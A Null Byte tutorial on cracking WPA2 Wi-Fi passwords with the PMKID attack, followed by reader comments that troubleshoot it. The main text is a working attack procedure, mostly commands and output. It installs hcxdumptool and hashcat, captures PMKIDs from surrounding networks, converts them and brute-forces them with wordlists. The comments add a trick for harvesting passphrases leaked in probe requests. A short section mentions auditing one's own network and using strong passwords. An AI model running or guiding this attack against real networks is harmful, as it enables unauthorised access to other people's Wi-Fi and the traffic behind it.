How to Hack Wi-Fi: Cracking WPA2 Passwords Using the New PMKID Hashcat Attack

Cracking WPA2 Passwords Using the New PMKID Hashcat Attack

Cracking the password for WPA2 networks has been roughly the same for many years, but a newer attack requires less interaction and info than previous techniques and has the added advantage of being able to target access points with no one connected. The latest attack against the PMKID uses Hashcat to crack WPA passwords and allows hackers to find networks with weak passwords more easily.

The Old Way to Crack WPA2 Passwords

The old way of cracking WPA2 has been around quite some time and involves momentarily disconnecting a connected device from the access point we want to try to crack. That has two downsides, which are essential for Wi-Fi hackers to understand.

The first downside is the requirement that someone is connected to the network to attack it. The network password might be weak and very easy to break, but without a device connected to kick off briefly, there is no opportunity to capture a handshake, thus no chance to try cracking it.

The second downside of this tactic is that it's noisy and legally troubling in that it forces you to send packets that deliberately disconnect an authorized user for a service they are paying to use. This kind of unauthorized interference is technically a denial-of-service attack and, if sustained, is equivalent to jamming a network. It can get you into trouble and is easily detectable by some of our previous guides.

A New Method of Password Cracking

Rather than relying on intercepting two-way communications between Wi-Fi devices to try cracking the password, an attacker can communicate directly with a vulnerable access point using the new method. On Aug. 4, 2018, a post on the Hashcat forum detailed a new technique leveraging an attack against the RSN IE (Robust Security Network Information Element) of a single EAPOL frame to capture the needed information to attempt a brute-force attack.

Similar to the previous attacks against WPA, the attacker must be in proximity to the network they wish to attack. The objective will be to use a Kali-compatible wireless network adapter to capture the information needed from the network to try brute-forcing the password. Rather than using Aireplay-ng or Aircrack-ng, we'll be using a new wireless attack tool to do this called hcxtools.

Using Hcxtools & Hashcat

Hcxdumptool and hcxpcaptool are tools written for Wi-Fi auditing and penetration testing, and they allow us to interact with nearby Wi-Fi networks to capture WPA handshakes and PMKID hashes. It works similar to Besside-ng in that it requires minimal arguments to start an attack from the command line, can be run against either specific targets or targets of convenience, and can be executed quickly over SSH on a Raspberry Pi or another device without a screen.

Once the PMKID is captured, the next step is to load the hash into Hashcat and attempt to crack the password. This is where hcxtools differs from Besside-ng, in that a conversion step is required to prepare the file for Hashcat. We'll use hcxpcaptool to convert our PCAPNG file into one Hashcat can work with, leaving only the step of selecting a robust list of passwords for your brute-forcing attempts.

It's worth mentioning that not every network is vulnerable to this attack. Because this is an optional field added by some manufacturers, you should not expect universal success with this technique. Whether you can capture the PMKID depends on if the manufacturer of the access point did you the favor of including an element that includes it, and whether you can crack the captured PMKID depends on if the underlying password is contained in your brute-force password list. If either condition is not met, this attack will fail.

What You'll Need

To try this attack, you'll need to be running Kali Linux and have access to a wireless network adapter that supports monitor mode and packet injection. We have several guides about selecting a compatible wireless network adapter below.

Aside from a Kali-compatible network adapter, make sure that you've fully updated and upgraded your system. If you don't, some packages can be out of date and cause issues while capturing.

Step 1: Install Hxctools & Hashcat

First, we'll install the tools we need. To download them, type the following into a terminal window.

~# git clone

Cloning into 'hcxdumptool'...
remote: Enumerating objects: 133, done.
remote: Counting objects: 100% (133/133), done.
remote: Compressing objects: 100% (97/97), done.
remote: Total 2127 (delta 82), reused 76 (delta 36), pack-reused 1994
Receiving objects: 100% (2127/2127), 759.53 KiB | 1.79 MiB/s, done.
Resolving deltas: 100% (1434/1434), done.

Then, change into the directory and finish the installation with make and then make install.

~# cd hcxdumptool
~/hcxdumptool# make

cc -O3 -Wall -Wextra -std=gnu99  -o hcxpioff hcxpioff.c
cc -O3 -Wall -Wextra -std=gnu99  -o hcxdumptool hcxdumptool.c  -lcrypto

~/hcxdumptool# make install

cc -O3 -Wall -Wextra -std=gnu99  -o hcxpioff hcxpioff.c
cc -O3 -Wall -Wextra -std=gnu99  -o hcxdumptool hcxdumptool.c  -lcrypto
install -m 0755 -D hcxpioff /usr/local/bin/hcxpioff
install -m 0755 -D hcxdumptool /usr/local/bin/hcxdumptool
rm -f hcxpioff
rm -f hcxdumptool
rm -f *.o *~

When it finishes installing, we'll move onto installing hxctools. To do so, open a new terminal window or leave the /hexdumptool directory, then install hxctools.

~# git clone

Cloning into 'hcxtools'...
remote: Enumerating objects: 120, done.
remote: Counting objects: 100% (120/120), done.
remote: Compressing objects: 100% (82/82), done.
remote: Total 6196 (delta 77), reused 79 (delta 38), pack-reused 6076
Receiving objects: 100% (6196/6196), 1.89 MiB | 5.02 MiB/s, done.
Resolving deltas: 100% (4320/4320), done.

Next, change into its directory and run make and make install like before. If you get an error, try typing sudo before the command.

~# cd hcxtools
~/hcxtools# make

mkdir -p .deps
cc -O3 -Wall -Wextra -std=gnu99  -MMD -MF .deps/hcxpcapngtool.d -o hcxpcapngtool hcxpcapngtool.c -lz -lcrypto
cc -O3 -Wall -Wextra -std=gnu99  -MMD -MF .deps/hcxhashtool.d -o hcxhashtool hcxhashtool.c -lcrypto -lcurl
cc -O3 -Wall -Wextra -std=gnu99  -MMD -MF .deps/hcxpsktool.d -o hcxpsktool hcxpsktool.c -lcrypto
cc -O3 -Wall -Wextra -std=gnu99  -MMD -MF .deps/hcxwltool.d -o hcxwltool hcxwltool.c
cc -O3 -Wall -Wextra -std=gnu99  -MMD -MF .deps/wlancap2wpasec.d -o wlancap2wpasec wlancap2wpasec.c -lcurl
cc -O3 -Wall -Wextra -std=gnu99  -MMD -MF .deps/whoismac.d -o whoismac whoismac.c -lcurl
cc -O3 -Wall -Wextra -std=gnu99  -MMD -MF .deps/hcxpmkidtool.d -o hcxpmkidtool hcxpmkidtool.c -lcrypto -lpthread
cc -O3 -Wall -Wextra -std=gnu99  -MMD -MF .deps/wlanhcx2john.d -o wlanhcx2john wlanhcx2john.c
cc -O3 -Wall -Wextra -std=gnu99  -MMD -MF .deps/hcxpcaptool.d -o hcxpcaptool hcxpcaptool.c -lz -lcrypto
cc -O3 -Wall -Wextra -std=gnu99  -MMD -MF .deps/hcxhashcattool.d -o hcxhashcattool hcxhashcattool.c -lcrypto -lpthread
cc -O3 -Wall -Wextra -std=gnu99  -MMD -MF .deps/hcxmactool.d -o hcxmactool hcxmactool.c
cc -O3 -Wall -Wextra -std=gnu99  -MMD -MF .deps/hcxessidtool.d -o hcxessidtool hcxessidtool.c
cc -O3 -Wall -Wextra -std=gnu99  -MMD -MF .deps/hcxhash2cap.d -o hcxhash2cap hcxhash2cap.c
cc -O3 -Wall -Wextra -std=gnu99  -MMD -MF .deps/wlanhc2hcx.d -o wlanhc2hcx wlanhc2hcx.c
cc -O3 -Wall -Wextra -std=gnu99  -MMD -MF .deps/wlanwkp2hcx.d -o wlanwkp2hcx wlanwkp2hcx.c
cc -O3 -Wall -Wextra -std=gnu99  -MMD -MF .deps/wlanhcxinfo.d -o wlanhcxinfo wlanhcxinfo.c
cc -O3 -Wall -Wextra -std=gnu99  -MMD -MF .deps/wlanhcx2ssid.d -o wlanhcx2ssid wlanhcx2ssid.c
cc -O3 -Wall -Wextra -std=gnu99  -MMD -MF .deps/wlanhcxcat.d -o wlanhcxcat wlanhcxcat.c -lcrypto
cc -O3 -Wall -Wextra -std=gnu99  -MMD -MF .deps/wlanpmk2hcx.d -o wlanpmk2hcx wlanpmk2hcx.c -lcrypto
cc -O3 -Wall -Wextra -std=gnu99  -MMD -MF .deps/wlanjohn2hcx.d -o wlanjohn2hcx wlanjohn2hcx.c
cc -O3 -Wall -Wextra -std=gnu99  -MMD -MF .deps/wlancow2hcxpmk.d -o wlancow2hcxpmk wlancow2hcxpmk.c

~/hcxtools# make install

install -m 0755 -D hcxpcapngtool /usr/local/bin/hcxpcapngtool
install -m 0755 -D hcxhashtool /usr/local/bin/hcxhashtool
install -m 0755 -D hcxpsktool /usr/local/bin/hcxpsktool
install -m 0755 -D hcxwltool /usr/local/bin/hcxwltool
install -m 0755 -D wlancap2wpasec /usr/local/bin/wlancap2wpasec
install -m 0755 -D whoismac /usr/local/bin/whoismac
install -m 0755 -D hcxpmkidtool /usr/local/bin/hcxpmkidtool
install -m 0755 -D wlanhcx2john /usr/local/bin/wlanhcx2john
install -m 0755 -D hcxpcaptool /usr/local/bin/hcxpcaptool
install -m 0755 -D hcxhashcattool /usr/local/bin/hcxhashcattool
install -m 0755 -D hcxmactool /usr/local/bin/hcxmactool
install -m 0755 -D hcxessidtool /usr/local/bin/hcxessidtool
install -m 0755 -D hcxhash2cap /usr/local/bin/hcxhash2cap
install -m 0755 -D wlanhc2hcx /usr/local/bin/wlanhc2hcx
install -m 0755 -D wlanwkp2hcx /usr/local/bin/wlanwkp2hcx
install -m 0755 -D wlanhcxinfo /usr/local/bin/wlanhcxinfo
install -m 0755 -D wlanhcx2ssid /usr/local/bin/wlanhcx2ssid
install -m 0755 -D wlanhcxcat /usr/local/bin/wlanhcxcat
install -m 0755 -D wlanpmk2hcx /usr/local/bin/wlanpmk2hcx
install -m 0755 -D wlanjohn2hcx /usr/local/bin/wlanjohn2hcx
install -m 0755 -D wlancow2hcxpmk /usr/local/bin/wlancow2hcxpmk

Finally, we'll need to install Hashcat, which should be easy, as it's included in the Kali Linux repo by default. Simply type the following to install the latest version of Hashcat.

~/hcxtools# cd
~# apt install hashcat

Reading package lists... Done
Building dependency tree
Reading state information... Done
hashcat is already the newest version (5.1.0+ds1-1).
The following packages were automatically installed and are no longer required:
  libdouble-conversion1 liblinear3
Use 'apt autoremove' to remove them.
0 upgraded, 0 newly installed, 0 to remove and 1863 not upgraded.

With this complete, we can move on to setting up the wireless network adapter.

Step 2: Prepare the Wireless Network Adapter

After plugging in your Kali-compatible wireless network adapter, you can find the name by typing ifconfig or ip a. Typically, it will be named something like wlan0. The first step will be to put the card into wireless monitor mode, allowing us to listen in on Wi-Fi traffic in the immediate area.

To do this, type the following command into a terminal window, substituting the name of your wireless network adapter for wlan0.

~# airmon-ng start wlan0

Found 3 processes that could cause trouble
Kill them using 'airmon-ng check kill' before putting
the card in monitor mode, they will interfere by changing channels
and sometimes putting the interface back in managed mode

 PID Name
 555 NetworkManager
 611 wpa_supplicant
6636 dhclient

PHY     Interface   Driver      Chipset

phy0    wlan0       ath9k       Qualcomm Atheros QCA9565 / AR9565 Wireless Network Adapter (rev 01)

                (mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
                (mac80211 station mode vif disabled for [phy0]wlan0)
phy1    wlan1       ath9k_htc   Atheros Communications, Inc. AR9271 802.11n

Now, your wireless network adapter should have a name like "wlan0mon" and be in monitor mode. You can confirm this by running ifconfig again.

Step 3: Use Hxcdump to Capture PMKIDs from Local Networks

Now we are ready to capture the PMKIDs of devices we want to try attacking. With our wireless network adapter in monitor mode as "wlan1mon," we'll execute the following command to begin the attack.

~# hcxdumptool -i wlan1mon -o galleria.pcapng --enable__status=1

Breaking this down, -i tells the program which interface we are using, in this case, wlan1mon. The filename we'll be saving the results to can be specified with the -o flag argument. The channel we want to scan on can be indicated with the -c flag followed by the number of the channel to scan.

In our command above, we're using wlan1mon to save captured PMKIDs to a file called "galleria.pcapng." While you can specify another status value, I haven't had success capturing with any value except 1.

warning: NetworkManager is running with pid 555
warning: wpa_supplicant is running with pid 611
warning: wlan1mon is probably a monitor interface

start capturing (stop with ctrl+c)
INTERFACE:...............: wlan1mon
FILTERLIST...............: 0 entries
MAC CLIENT...............: fcc233ca8bc5
MAC ACCESS POINT.........: 10ae604b9e82 (incremented on every new client)
EAPOL TIMEOUT............: 150000
REPLAYCOUNT..............: 62439
ANONCE...................: d8dd2206c82ad030e843a39e8f99281e215492dbef56f693cd882d4dfcde9956

[22:17:32 - 001] c8b5adb615ea -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:17:32 - 001] c8b5adb615e9 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:17:33 - 001] 2c95694f3ca0 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:17:33 - 001] 2c95694f3ca0 -> b4b686abc81a [FOUND PMKID]
[22:17:48 - 011] 14edbb9938ea -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:17:48 - 011] 88964e3a8ea0 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:17:49 - 011] dc7fa425888a -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:17:51 - 011] 88964e801fa0 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:17:57 - 001] 9822efc6fdff -> ba634d3eb80d [EAPOL 4/4 - M4 RETRY ATTACK]
[22:17:57 - 001] 9822efc6fdff -> ba634d3eb80d [FOUND HANDSHAKE AP-LESS, EAPOL TIMEOUT 6696]
[22:18:04 - 011] 803773defd01 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:19:21 - 011] 14edbb9ba0e6 -> 803773defd01 [FOUND AUTHORIZED HANDSHAKE, EAPOL TIMEOUT 15247]
[22:19:34 - 006] 0618d629465b -> 58fb8433aac2 [FOUND AUTHORIZED HANDSHAKE, EAPOL TIMEOUT 2832]
[22:19:42 - 005] e0220203294e -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:19:57 - 011] 14edbb9ba0e6 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:20:02 - 008] 14edbbd29326 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:20:04 - 008] 1c872c707c60 -> 78e7d17791e7 [FOUND PMKID]
[22:20:11 - 009] e0220453a576 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:20:27 - 001] ace2d32602da -> c8665d5dd654 [FOUND HANDSHAKE AP-LESS, EAPOL TIMEOUT 5202]
INFO: cha=2, rx=32752, rx(dropped)=2801, tx=2205, powned=18, err=0

When you've gathered enough, you can stop the program by typing Control-C to end the attack. This should produce a PCAPNG file containing the information we need to attempt a brute-forcing attack, but we will need to convert it into a format Hashcat can understand.

Step 4: Use Hxcpcaptool to Convert the Dump for Hashcat

To convert our PCAPNG file, we'll use hcxpcaptool with a few arguments specified. In the same folder that your .PCAPNG file is saved, run the following command in a terminal window.

~# hcxpcaptool -E essidlist -I identitylist -U usernamelist -z galleriaHC.16800 galleria.pcapng

This command is telling hxcpcaptool to use the information included in the file to help Hashcat understand it with the -E, -I, and -U flags. The -Z flag is used for the name of the newly converted file for Hashcat to use, and the last part of the command is the PCAPNG file we want to convert.

Running the command should show us the following.

file name....................: galleria.pcapng
file type....................: pcapng 1.0
file hardware information....: x86_64
file os information..........: Linux 4.18.0-kali2-amd64
file application information.: hcxdumptool 4.2.1
network type.................: DLT_IEEE802_11_RADIO (127)
endianess....................: little endian
read errors..................: flawless
packets inside...............: 1089
skipped packets..............: 0
packets with GPS data........: 0
packets with FCS.............: 732
beacons (with ESSID inside)..: 49
probe requests...............: 26
probe responses..............: 40
association requests.........: 103
association responses........: 204
reassociation requests.......: 2
reassocaition responses......: 7
authentications (OPEN SYSTEM): 346
authentications (BROADCOM)...: 114
authentications (APPLE)......: 1
EAPOL packets................: 304
EAPOL PMKIDs.................: 21
best handshakes..............: 4 (ap-less: 1)

21 PMKID(s) written to galleriahC.16800

Here, we can see we've gathered 21 PMKIDs in a short amount of time. Now we can use the "galleriaHC.16800" file in Hashcat to try cracking network passwords.

Step 5: Select a Password List & Brute Force with Hashcat

To start attacking the hashes we've captured, we'll need to pick a good password list. You can find several good password lists to get started over at the SecList collection. Once you have a password list, put it in the same folder as the .16800 file you just converted, and then run the following command in a terminal window.

~# hashcat -m 16800 galleriaHC.16800 -a 0 --kernel-accel=1 -w 4 --force 'topwifipass.txt'

In this command, we are starting Hashcat in 16800 mode, which is for attacking WPA-PMKID-PBKDF2 network protocols. Next, we'll specify the name of the file we want to crack, in this case, "galleriaHC.16800." The -a flag tells us which types of attack to use, in this case, a "straight" attack, and then the -w and --kernel-accel=1 flags specifies the highest performance workload profile. If your computer suffers performance issues, you can lower the number in the -w argument.

Next, the --force option ignores any warnings to proceed with the attack, and the last part of the command specifies the password list we're using to try to brute force the PMKIDs in our file, in this case, called "topwifipass.txt."

hashcat (v4.2.1) starting...

OpenCL Platform #1: The pocl project
* Device #1: pthread-AMD A8-6410 APU with AMD Radeon R5 Graphics, 2553/2553 MB allocatable, 4MCU

Hashes: 21 digests; 21 unique digests, 20 unique salts

Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers:
* Zero-Byte
* Slow-Hash-SIMD-LOOP

Minimum password length supported by kernel: 8
Maximum password length supported by kernel: 63

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.

* Device #1: build_opts '-cl-std=CL1.1 -I OpenCL -I /usr/share/hashcat/OpenCL -D VENDOR ID=64 -D CUDA_ARCH=0 -D AMD_ROCM=0 -D VECT_SIZE=4 -D DEVICE_TYPE=2 -D DGST_R0=0 -D DGST_R1=1 -D DGST_R2=2 -D DGST_R3=3 -D DGST_ELEM=4 -D KERN_TYPE=16800 -D _unroll'
Dictionary cache hit:

* Filename..: topwifipass.txt
* Passwords.: 4801
* Bytes.....: 45277
* Keyspace..: 4801

[s]tatus [p]ause [b]ypass [c]heckpoint [q]uit =>

Depending on your hardware speed and the size of your password list, this can take quite some time to complete. To see the status at any time, you can press the S key for an update.

Step 6: Interpret the Results

As Hashcat cracks away, you'll be able to check in as it progresses to see if any keys have been recovered.

Hash.Type........: WPA-PMKID-PBKDF2
Hash.Target......: galleriaHC.16800
Time.Started.....: Sun Oct 28 22:32:57 2018 (7 mins, 50 secs)
Time.Estimated...: Sun Oct 28 22:57:50 2018 (17 mins, 3 secs)
Guess.Base.......: File (topwifipass.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.Dev.#1.....:      64 H/s (15.43ms) @ Accel:1 Loops:1024 Thr:1 Vec:4
Recovered........: 0/21 (0.00%) Digests, 0/20 (0.00%) Salts
Progress.........: 30180/96020 (31.43%)
Rejected.........: 0/30180 (0.00%)
Restore.Point....: 1508/4801 (31.41%)
Candidates.#1....: peter123 -> moneyman
HWon.Dev.#1......: N/A

[s]tatus [p]ause [b]ypass [c]heckpoint [q]uit =>

Session..........: hashcat
Status...........: Running
Hash.Type........: WPA-PMKID-PBKDF2
Hash.Target......: galleriaHC.16800
Time.Started.....: Sun Oct 28 22:32:57 2018 (19 mins, 56 secs)
Time.Estimated...: Sun Oct 28 22:57:54 2018 (5 mins, 3 secs)
Guess.Base.......: File (topwifipass.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.Dev.#1.....:      64 H/s (15.24ms) @ Accel:1 Loops:1024 Thr:1 Vec:4
Recovered........: 0/21 (0.00%) Digests, 0/20 (0.00%) Salts
Progress.........: 76736/96020 (79.92%)
Rejected.........: 0/76736 (0.00%)
Restore.Point....: 3836/4801 (79.90%)
Candidates.#1....: monopoli -> mercenary
HWon.Dev.#1......: N/A

[s]tatus [p]ause [b]ypass [c]heckpoint [q]uit =>

When the password list is getting close to the end, Hashcat will automatically adjust the workload and give you a final report when it's complete.

Approaching final keyspace - workload adjusted.

Session..........: hashcat
Status...........: Exhausted
Hash.Type........: WPA-PMKID-PBKDF2
Hash.Target......: hotspotcap.16800
Time.Started.....: Sun Oct 28 18:05:57 2018 (3 mins, 49 secs)
Time.Estimated...: Sun Oct 28 18:09:46 2018 (0 secs)
Guess.Base.......: File (topwifipass.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.Dev.#1.....:      42 H/s (15.56ms) @ Accel:1 Loops:1024 Thr:1 Vec:4
Recovered........: 0/2 (0.00%) Digests, 0/2 (0.00%) Salts
Progress.........: 9602/9602 (100.0%)
Rejected.........: 2/9602 (0.02%)
Restore.Point....: 4801/4801 (100.0%)
Candidates.#1....: 159159159 -> 00001111
HWon.Dev.#1......: N/A

Started: Sun Oct 28 18:05:56 2018
Stopped: Sun Oct 28 18:09:49 2018

If you've managed to crack any passwords, you'll see them here. In our test run, none of the PMKIDs we gathered contained passwords in our password list, thus we were unable to crack any of the hashes. This will most likely be your result too against any networks with a strong password but expect to see results here for networks using a weak password.

The PMKID Hashcat Attack Makes Wi-Fi Attacks Easier

While the new attack against Wi-Fi passwords makes it easier for hackers to attempt an attack on a target, the same methods that were effective against previous types of WPA cracking remain effective. If your network doesn't even support the robust security element containing the PMKID, this attack has no chance of success. You can audit your own network with hcxtools to see if it is susceptible to this attack.

Even if your network is vulnerable, a strong password is still the best defense against an attacker gaining access to your Wi-Fi network using this or another password cracking attack.

Because these attacks rely on guessing the password the Wi-Fi network is using, there are two common sources of guesses; The first is users picking default or outrageously bad passwords, such as "12345678" or "password." These will be easily cracked. The second source of password guesses comes from data breaches that reveal millions of real user passwords. Because many users will reuse passwords between different types of accounts, these lists tend to be very effective at cracking Wi-Fi networks.

I hope you enjoyed this guide to the new PMKID-based Hashcat attack on WPA2 passwords! If you have any questions about this tutorial on Wi-Fi password cracking or you have a comment, feel free to reach me on Twitter @KodyKinzie.

Want to start making money as a white hat hacker? Jump-start your white-hat hacking career with our 2020 Premium Ethical Hacking Certification Training Bundle from the new Null Byte Shop and get over 60 hours of training from ethical hacking professionals.

Buy Now (90% off) >

Cover photo and screenshots by Kody/Null Byte

Our Best Hacking & Security Guides

New Null Byte posts — delivered straight to your inbox.


No joy there. On hcxtools make get error...
openssl/sha.h no such file or directory

If you check out the file, you'll find a list of requirements including a command to install everything.

apt-get install libcurl4-openssl-dev libssl-dev zlib1g-dev libpcap-dev

Good answer, thank you

When I try to do the command it says
"unable to locate package libcurl4-openssl-dev"
"unable to locate package libssl-dev"
Using a dedicated Kali machine

apt-get install libcurl4-openssl-dev libssl-dev zlib1g-dev

Try :
`sudo apt-get install libssl-dev`
It worked for me!
Let me know if it worked for u

how can I create a spam email

what? no

hey there. I don't know you but I need help with some hacking/password cracking. If you can help me out I'd be very thankful

Quite unrelated, instead of using brute force, I suggest going to fish "almost" literally for WPA passphrase. You need quite a bit of luck.

Using a tool like probemon, one can sometimes instead of SSID, get a WPA passphrase in clear.

The explanation is that a novice (android ?) user inputted the passphrase in the SSID field when trying to connect to an AP. (If you go to "add a network" in wifi settings instead of taping on the SSID right away)

Since then the phone is sending probe requests with the passphrase in clear as the supposedly SSID.

  1. One problem is that it is rather random and rely on user error.
  2. You only get the passphrase but as the user fails to complete the connection to the AP, the SSID is never seen in the probe request. So you don't know the SSID associated with the pasphrase you just grabbed.

So if you get the passphrase you are looking for with this method, go and play the lottery right away. You are a very lucky (wo)man.

Dear, i am getting the following error when u run the command: hashcat -m 16800 testHC.16800 -a 0 --kernel-accel=1 -w 4 --force 'rockyou.txt'

hashcat (v5.0.0-109-gb457f402) starting...


hashcat (v5.0.0-109-gb457f402) starting...


I am using Kali linux on virtualbox


brother help me .. i get this error when i try to install hcxtools..
nhcx2cap.c -lpcap
wlanhcx2cap.c:12:10: fatal error: pcap.h: No such file or directory
#include <pcap.h>
compilation terminated.
make: ** Makefile:81: wlanhcx2cap Error 1

You need to install the dependencies, including the various header files that are included with `-dev` packages. Try:
> apt-get install libcurl4-openssl-dev libssl-dev zlib1g-dev libpcap-dev

and secondly help me to upgrade and install postgresql10 to postgresql11 and pg_upgradecluster

Hi, hashcat was working fine and then I pressed 'q' to quit while it was running. When I restarted with the same command this happened:

hashcat -m 16800 galleriaHC.16800 -a 0 --kernel-accel=1 -w 4 --force 'rockyouplus.txt'
hashcat (v5.0.0) starting...

OpenCL Platform #1: The pocl project

  • Device #1: pthread-Intel(R) Core(TM) i9-7980XE CPU @ 2.60GHz, 8192/29821 MB allocatable, 36MCU

Hashes: 4 digests; 4 unique digests, 4 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers:

  • Zero-Byte
  • Slow-Hash-SIMD-LOOP

Minimum password length supported by kernel: 8
Maximum password length supported by kernel: 63

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.

  • Device #1: buildopts '-cl-std=CL1.2 -I OpenCL -I /usr/share/hashcat/OpenCL -D VENDORID=64 -D CUDAARCH=0 -D AMDROCM=0 -D VECTSIZE=16 -D DEVICETYPE=2 -D DGSTR0=0 -D DGSTR1=1 -D DGSTR2=2 -D DGSTR3=3 -D DGSTELEM=4 -D KERNTYPE=16800 -D _unroll'

Dictionary cache built:

  • Filename..: rockyouplus.txt
  • Passwords.: 14353785
  • Bytes.....: 140698182
  • Keyspace..: 14353736
  • Runtime...: 2 secs

hashcat: /build/pocl-rUy81a/pocl-1.1/lib/CL/devices/common.c:375: poclmemobjscleanup: Assertion `(event->memobjsi)->pocl_refcount > 0' failed.


I tried purging every hashcat dependency, then purging hashcat, then restarting, then reinstalling everything but I got the same result.

thank you.

your step 3

hcxdumptool -i wlan1mon -o galleria.pcapng --enable__status=1

should be

hcxdumptool -i wlan1mon -o galleria.pcapng --enable_status=1

additional underscore enable and status

I've had successful steps 1 & 2 but unsuccessful step 3. wlan2 is a compatible ALFA and is in monitor mode but I'm having the errors below. Thoughts?

root@kali:~# hcxdumptool -i wlan2mon -o galleria.pcapng --enable_status=1
warning: wlan2mon is probably a monitor interface
failed to save current interface flags: No such device
failed to init socket

root@kali:~# hcxdumptool -i wlan1mon -o galleria.pcapng --enable_status=1
warning: wlan1mon is probably a monitor interface
failed to save current interface flags: No such device
failed to init socket

root@kali:~# hcxdumptool -i wlan0mon -o galleria.pcapng --enable_status=1
warning: wlan0mon is probably a monitor interface
failed to save current interface flags: No such device
failed to init socket

I keep trying to add more copy/paste details but getting AJAX errors...

root@kali:~# iwconfig
eth0 no wireless extensions.

wlan1 IEEE 802.11 ESSID:
Mode:Managed Frequency:2.462 GHz Access Point: ############
Bit Rate=72.2 Mb/s Tx-Power=31 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Encryption key:off
Power Management:on
Link Quality=58/70 Signal level=-52 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0

wlan2 IEEE 802.11 Mode:Monitor Frequency:2.412 GHz Tx-Power=20 dBm
Retry short long limit:2 RTS thr:off Fragment thr:off
Power Management:off

wlan0 unassociated ESSID:"" Nickname:"<WIFI@REALTEK>"
Mode:Managed Frequency=2.412 GHz Access Point: Not-Associated
Retry:off RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality:0 Signal level:0 Noise level:0
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0

lo no wireless extensions.

root@kali:~# airmon-ng start wlan2

PHY Interface Driver Chipset

null wlan0 r8188eu
phy0 wlan1 brcmfmac Broadcom 43430
phy1 wlan2 rt2800usb Ralink Technology, Corp. RT2870/RT3070

(mac80211 monitor mode already enabled for phy1wlan2 on phy110)

oot@kali:~# aireplay-ng -test wlan2mon
Invalid tods filter. 0,1
"aireplay-ng --help" for help.
root@kali:~# aireplay-ng -9 wlan2
21:41:14 Trying broadcast probe requests...
21:41:14 Injection is working!
21:41:16 Found 2 APs

21:41:16 Trying directed probe requests...
21:41:16 ############ - channel: 11 -
21:41:17 Ping (min/avg/max): 1.226ms/10.200ms/71.488ms Power: -30.97
21:41:17 29/30: 96%

21:41:17 00:00:00:00:00:00 - channel: 11 - ''
21:41:19 Ping (min/avg/max): 1.204ms/9.391ms/30.852ms Power: -16.45
21:41:19 22/30: 73%

good command for launching hcxtools:
sudo hcxdumptool -i wlan0mon -o galleria.pcapng --enable_status=1
hcxdumptool -i wlan0mon -o galleria.pcapng --enable__status=1 give me error because of the double underscore
for the errors cuz of dependencies i've installed to fix it ( running parrot 4.4):
sudo apt-get install libcurl4-openssl-dev
sudo apt-get install libssl-dev


What if hashcat won't run? It says started and stopped because of openCL error. Change computers?

hey man, whenever I use this code:
hcxdumptool -i wlan1mon -o galleria.pcapng --enable_status=1

the output is:
hcxdumptool: unrecognized option '--enable_status=1'
hcxdumptool 5.1.3 (C) 2019 by ZeroBeat
usage: hcxdumptool -h for help

I'm stuck

Hey, just a there a way to retrieve the PMKID from an established connection on a guest network? My router does not expose its PMKID, has a main private connection, and a "guest" connection for other customers on the go. It is very simple to connect for a certain amount of time as a guest on my connection. I wonder if the PMKID is the same for one and the other.

If it was the same, one could retrieve it connecting as guest, and then apply it on the "private" ESSID.
Am I right? Does it make any sense?

Nullbyte website & youtube is the Nr. 1 source for beginner hackers/pentesters to start out! The quality is unmatched anywhere! The guides are beautifull and well written down to the T. And I love his personality, tone of voice, detailed instructions, speed of talk, it all is perfect for leaning and he is a stereotype hacker haha! I fucking love it. And he got a true passion for it too ;) That kind of shit you cant fake!

Good bless you @nullbytes @kody

Hashcat is not in my respiratory in kali:
git clone h-ttps://

  • remove the (-) in https

sudo make

sudo make install

  • Have fun hacking friends

hello guys i have a problem during install hcxtools
make install
cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/hcxpcaptool.d -o hcxpcaptool hcxpcaptool.c -lz -lcrypto
hcxpcaptool.c:16:10: fatal error: openssl/sha.h: No such file or directory
#include <openssl/sha.h>
compilation terminated.
make: ** Makefile:79: hcxpcaptool Error 1

i also tried with sudo (sudo make install ) and i got the same error

Hello everybody, I have a question. Is it normal that after I install everithing and start the hcxdumptool, it is searching for a long time? I forgot to tell, that I'm on a firtual machine.

It is collecting Till you stop that Program with strg+c. After that you can go on, optimize/clean the cap to get a pcapng file with that you can continue.

Hope that helps a little
happy cracking

Hi there boys. I have All running now. Perfect. But i want to change the passwordlist to use hascats mask_attack. Where i have to place the command? d?d?d?d?d?.....

Is this attack still working?
Im using it recently and it just got so many zeroed and useless
EAPOL packets (WPA2).............: 5984
PMKIDs (zeroed and useless)......: 194
PMKIDs (not zeroed - total)......: 2
PMKIDs (WPA2)....................: 203
PMKIDs from access points........: 2
best handshakes (total)..........: 34 (ap-less: 23)
best PMKIDs (total)..............: 2

summary output file(s):
2 PMKID(s) written to sbXXXX.16800

I've got many that they are like

